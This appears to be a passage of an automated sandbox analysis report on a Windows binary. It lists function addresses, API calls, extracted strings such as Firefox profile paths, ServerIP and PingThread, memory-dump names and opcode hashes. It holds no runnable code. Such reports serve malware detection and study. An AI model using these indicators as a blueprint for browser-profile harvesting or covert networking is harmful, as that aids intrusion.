                                                                                                        • API ID: H_prolog3$CriticalSection$EnterInitializeLeave
                                                                                                        • String ID: NI$ QS
                                                                                                        • API String ID: 3061355161-1958716692
                                                                                                        • Opcode ID: 568332f36d61dd67af3b2749d1da95078643d3d1799ccd444a6480c1b3960d84
                                                                                                        • Instruction ID: 851df7f533dbb76401c13edf793070be194cb0c7cad1b6d438316afebe21b6e0
                                                                                                        • Opcode Fuzzy Hash: 568332f36d61dd67af3b2749d1da95078643d3d1799ccd444a6480c1b3960d84
                                                                                                        • Instruction Fuzzy Hash: A23114B5E01609BADB08DFA0CD529EFBB38FF51344F00406EB50666241D7795F05DBA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0050251E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00502525
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004E91D9: __EH_prolog3.LIBCMT ref: 004E91E0
                                                                                                        • GetLastError.KERNEL32(00000000,00000000,WaitingThread.new ConnectionThread.Failed , LE=,00000000), ref: 005025DB
                                                                                                          • Part of subcall function 004C47CD: __EH_prolog3.LIBCMT ref: 004C47D4
                                                                                                          • Part of subcall function 004E9FA6: __EH_prolog3.LIBCMT ref: 004E9FAD
                                                                                                          • Part of subcall function 004E9FA6: CreateThread.KERNEL32 ref: 004E9FDD
                                                                                                        Strings
                                                                                                        • WaitingThread.new ConnectionThread.Failed , LE=, xrefs: 005025C8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CreateCriticalErrorInitializeLastSectionThread
                                                                                                        • String ID: WaitingThread.new ConnectionThread.Failed , LE=
                                                                                                        • API String ID: 628715854-23746943
                                                                                                        • Opcode ID: aa783e8c590e000ae41c778743bf89813f22bf9a23ddc9ae27dd6f1e3bbc44b0
                                                                                                        • Instruction ID: 81e4dc0dad3a249792ff11a13af2a53550af703f3c5101841e93d9e9b8aec9e5
                                                                                                        • Opcode Fuzzy Hash: aa783e8c590e000ae41c778743bf89813f22bf9a23ddc9ae27dd6f1e3bbc44b0
                                                                                                        • Instruction Fuzzy Hash: 4431F4B0D00248EEEB05EBA5C85BAEEBF78AF55308F10425EF111671D2DB781E44C766
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004DFFC2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004DFFD0
                                                                                                          • Part of subcall function 0050E92E: __EH_prolog3.LIBCMT ref: 0050E935
                                                                                                          • Part of subcall function 0050E764: __EH_prolog3.LIBCMT ref: 0050E76B
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 0050E96A: __EH_prolog3.LIBCMT ref: 0050E971
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalSection$DeleteInitialize
                                                                                                        • String ID: ServerIP$ServerUnavailable
                                                                                                        • API String ID: 4214761318-1265899858
                                                                                                        • Opcode ID: f998d9aca42b6dcb2844f608ec93746007dc60246cb2b0e6bf4885081be0fe0c
                                                                                                        • Instruction ID: fbe62fb1cb12919f1f59d2d0d5d211282dc196f237deb565aeb40cd644f6300f
                                                                                                        • Opcode Fuzzy Hash: f998d9aca42b6dcb2844f608ec93746007dc60246cb2b0e6bf4885081be0fe0c
                                                                                                        • Instruction Fuzzy Hash: 4631B43180428CEEDB05EBA4C896EDD7B78EF21304F1484AEE44667192EB746B09C761
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00503540, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00503547
                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004EA1FF,00000004,004E8E44,0000002C,004E9245,?,?,?,00000000,?,?), ref: 004A17A0
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004E90F2,00000000,?,?,?,?,?,?,?,?,Default,?,?), ref: 004A1C05
                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,Default,?,?,?,?,00000000,?,?), ref: 004A1C45
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                          • Part of subcall function 00503288: __EH_prolog3.LIBCMT ref: 0050328F
                                                                                                          • Part of subcall function 00503288: _malloc.LIBCMT ref: 0050329B
                                                                                                        Strings
                                                                                                        • \Mozilla\Firefox\Profiles\, xrefs: 005035C8
                                                                                                        • \Mozilla\Profiles\default\, xrefs: 005035FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$DeleteEnterLeave_malloc
                                                                                                        • String ID: \Mozilla\Firefox\Profiles\$\Mozilla\Profiles\default\
                                                                                                        • API String ID: 4289920900-1112706577
                                                                                                        • Opcode ID: f589898a083d6b1c4c592f2942186749c07b0d23d6d96fce7a49a62a05559de3
                                                                                                        • Instruction ID: 34b72d607ab1a7d6e289004e4756f08ea93e8813113aac19830773f17794f34d
                                                                                                        • Opcode Fuzzy Hash: f589898a083d6b1c4c592f2942186749c07b0d23d6d96fce7a49a62a05559de3
                                                                                                        • Instruction Fuzzy Hash: 2331D134401784EAD711EB75C956BCEFBF5AF22304F50865DA097631E2CBB82B08CB55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00502644, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 0050264B
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004E91D9: __EH_prolog3.LIBCMT ref: 004E91E0
                                                                                                          • Part of subcall function 004C47CD: __EH_prolog3.LIBCMT ref: 004C47D4
                                                                                                          • Part of subcall function 004E9FA6: __EH_prolog3.LIBCMT ref: 004E9FAD
                                                                                                          • Part of subcall function 004E9FA6: CreateThread.KERNEL32 ref: 004E9FDD
                                                                                                        Strings
                                                                                                        • WatitingThread.new ConnectionThread.Failed, xrefs: 005026F1
                                                                                                        • eingehende IPC-Verbindung, xrefs: 0050265B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CreateCriticalInitializeSectionThread
                                                                                                        • String ID: WatitingThread.new ConnectionThread.Failed$eingehende IPC-Verbindung
                                                                                                        • API String ID: 991770091-341428905
                                                                                                        • Opcode ID: f1136cc59f5e9203443b3e66c004e02c4440b6e950cea4308eacbc443682b757
                                                                                                        • Instruction ID: 95a725770c04ea122dbc4d0f34c902012e069460ecc3f0c55dc72dfd3e64f628
                                                                                                        • Opcode Fuzzy Hash: f1136cc59f5e9203443b3e66c004e02c4440b6e950cea4308eacbc443682b757
                                                                                                        • Instruction Fuzzy Hash: B921AEB0900249EBEB04EBE5C88BAEEBF74AF55318F10424EF251572C2D7B45E44C7A6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004D9A5D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004D9A64
                                                                                                          • Part of subcall function 004D91DF: __EH_prolog3.LIBCMT ref: 004D9201
                                                                                                          • Part of subcall function 004D91DF: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004D9306
                                                                                                          • Part of subcall function 004D91DF: RegEnumKeyExW.ADVAPI32(?,00000000,80000001,?,00000000,00000000,00000000,?), ref: 004D933F
                                                                                                          • Part of subcall function 004D91DF: RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000001,00000000), ref: 004D93F5
                                                                                                          • Part of subcall function 004D843A: __EH_prolog3.LIBCMT ref: 004D8441
                                                                                                          • Part of subcall function 004D843A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020006,?,?,?,?,?,?,00000004,004D9BA1,0084C304), ref: 004D8467
                                                                                                          • Part of subcall function 004D843A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000004,004D9BA1,0084C304), ref: 004D8474
                                                                                                          • Part of subcall function 004D91DF: RegEnumValueW.ADVAPI32(?,00000000,80000001,00000100,00000000,?,00000000,?), ref: 004D96CD
                                                                                                          • Part of subcall function 004D91DF: RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000001,00000000,00000000), ref: 004D99EA
                                                                                                          • Part of subcall function 004D91DF: RegCloseKey.ADVAPI32(80000002), ref: 004D9A05
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseEnumH_prolog3$Open$Value
                                                                                                        • String ID: Machine:$User:
                                                                                                        • API String ID: 1442275762-3964720792
                                                                                                        • Opcode ID: c9803e310ef392a4890e693f6a4ced998bf949715911cb7f21bc2c9f5a1a19f0
                                                                                                        • Instruction ID: d51dc8bd3b0e1553d8746914cd8aad9d185616760c972f5bcd4c4530a76a30b2
                                                                                                        • Opcode Fuzzy Hash: c9803e310ef392a4890e693f6a4ced998bf949715911cb7f21bc2c9f5a1a19f0
                                                                                                        • Instruction Fuzzy Hash: CB219170D11249ABDB14FF79C55B2AD7F71AF41324F20426EE5102B3D2CA390F09979A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004E00C1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004E00CC
                                                                                                          • Part of subcall function 0050E92E: __EH_prolog3.LIBCMT ref: 0050E935
                                                                                                          • Part of subcall function 0050E764: __EH_prolog3.LIBCMT ref: 0050E76B
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 0050E96A: __EH_prolog3.LIBCMT ref: 0050E971
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalSection$DeleteInitialize
                                                                                                        • String ID: UNCHANGED$VerifyIP
                                                                                                        • API String ID: 4214761318-2930671668
                                                                                                        • Opcode ID: 9255c5f9926835463871ef18442a710c6138e5cdcb1b176b20544d5c1e3ae003
                                                                                                        • Instruction ID: cdd2f9ab1fcc20d1d968178ed03b8e7fc89dd10e219b05648128e262eb6260d3
                                                                                                        • Opcode Fuzzy Hash: 9255c5f9926835463871ef18442a710c6138e5cdcb1b176b20544d5c1e3ae003
                                                                                                        • Instruction Fuzzy Hash: 9C21C471800288EEDB05EBA4C892BDD7B74AF21304F1484AEE44667292EF746F49CB55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00498774, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 0049877B
                                                                                                          • Part of subcall function 0047FD97: __EH_prolog3.LIBCMT ref: 0047FD9E
                                                                                                          • Part of subcall function 0047EFBC: __EH_prolog3.LIBCMT ref: 0047EFC3
                                                                                                        Strings
                                                                                                        • InputBuffer, xrefs: 0049879F
                                                                                                        • StringStore: missing InputBuffer argument, xrefs: 004987AB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3
                                                                                                        • String ID: InputBuffer$StringStore: missing InputBuffer argument
                                                                                                        • API String ID: 431132790-2380213735
                                                                                                        • Opcode ID: 245eb0b22f26eba4a2329f9fc9dfa2abc255e24fa970076ec652ae30ee0c7a3a
                                                                                                        • Instruction ID: 132df2d07a990b5e890274b4591fa2d819ca771c45cb11b3d84564ae36daedb5
                                                                                                        • Opcode Fuzzy Hash: 245eb0b22f26eba4a2329f9fc9dfa2abc255e24fa970076ec652ae30ee0c7a3a
                                                                                                        • Instruction Fuzzy Hash: 89112B7194024AAFDF10EFE8C891DEEBBB5BF14304F5044AEE105A7282DB756E08CB65
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00503288, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 0050328F
                                                                                                        • _malloc.LIBCMT ref: 0050329B
                                                                                                          • Part of subcall function 00537172: __FF_MSGBANNER.LIBCMT ref: 00537195
                                                                                                          • Part of subcall function 00537172: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00540F49,?,00000001,?,00544586,00000018,007D5C28,0000000C,00544615,?), ref: 005371EA
                                                                                                          • Part of subcall function 00503185: __EH_prolog3.LIBCMT ref: 0050318C
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004E90F2,00000000,?,?,?,?,?,?,?,?,Default,?,?), ref: 004A1C05
                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,Default,?,?,?,?,00000000,?,?), ref: 004A1C45
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                        Strings
                                                                                                        • ProxySearch.setUserBaseDir: getAppDataPathImpersonate failed, xrefs: 005032ED
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalSection$AllocateDeleteEnterHeapInitializeLeave_malloc
                                                                                                        • String ID: ProxySearch.setUserBaseDir: getAppDataPathImpersonate failed
                                                                                                        • API String ID: 2960791462-1931582195
                                                                                                        • Opcode ID: 682d5b7b5bef252bb7fdf9c224f54107b1ee4edd84646b82b4d2935502d588d8
